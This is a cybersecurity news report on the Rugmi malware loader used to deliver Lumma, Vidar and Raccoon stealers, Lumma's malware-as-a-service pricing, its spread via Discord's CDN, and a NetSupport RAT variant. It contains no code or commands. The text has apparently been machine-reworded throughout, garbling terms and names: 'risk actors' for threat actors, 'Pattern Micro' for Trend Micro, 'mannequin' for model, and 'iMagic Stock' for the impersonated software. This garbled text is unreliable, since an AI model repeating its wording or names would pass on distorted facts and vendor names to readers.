A brand new malware loader is being utilized by risk actors to ship a variety of data stealers comparable to Lumma Stealer (aka LummaC2), Vidar, RecordBreaker (aka Raccoon Stealer V2), and Rescoms.
Cybersecurity agency ESET is monitoring the trojan underneath the title Win/TrojanDownloader.Rugmi.
“This malware is a loader with three sorts of elements: a downloader that downloads an encrypted payload, a loader that runs the payload from inside assets, and one other loader that runs the payload from an exterior file on the disk,” the corporate stated in its Risk Report H2 2023.
Telemetry knowledge gathered by the corporate exhibits that detections for the Rugmi loader spiked in October and November 2023, surging from single digit every day numbers to a whole lot per day.
Stealer malware is often bought underneath a malware-as-a-service (MaaS) mannequin to different risk actors on a subscription foundation. Lumma Stealer, as an illustration, is marketed in underground boards for $250 a month. The costliest plan prices $20,000, nevertheless it additionally provides the shoppers entry to the supply code and the appropriate to promote it.
There may be proof to recommend that the codebase related to Mars, Arkei, and Vidar stealers has been repurposed to create Lumma.
Moreover constantly adapting its techniques to evade detection, the off-the-shelf software is distributed by way of quite a lot of strategies starting from malvertising to faux browser updates to cracked installations of standard software program comparable to VLC media participant and OpenAI ChatGPT.
One other method issues the usage of Discord’s content material supply community (CDN) to host and propagate the malware, as revealed by Pattern Micro in October 2023.
This entails leveraging a mix of random and compromised Discord accounts to ship direct messages to potential targets, providing them $10 or a Discord Nitro subscription in change for his or her help on a challenge.
Customers who comply with the provide are then urged to obtain an executable file hosted on Discord CDN that masquerades as iMagic Stock however, in actuality, accommodates the Lumma Stealer payload.
“Prepared-made malware options contribute to the proliferation of malicious campaigns as a result of they make the malware out there even to doubtlessly much less technically expert risk actors,” ESET stated.
“Providing a broader vary of features then serves to render Lumma Stealer much more enticing as a product.”
The disclosures come as McAfee Labs disclosed a brand new variant of NetSupport RAT, which emerged from its authentic progenitor NetSupport Supervisor and has since been put to make use of by preliminary entry brokers to collect data and carry out extra actions on victims of curiosity.
“The an infection begins with obfuscated JavaScript information, serving because the preliminary level of entry for the malware,” McAfee stated, including it highlights the “evolving techniques employed by cybercriminals.”
The execution of the JavaScript file advances the assault chain by operating PowerShell instructions to retrieve the distant management and stealer malware from an actor-controlled server. The marketing campaign’s main targets embrace the U.S. and Canada.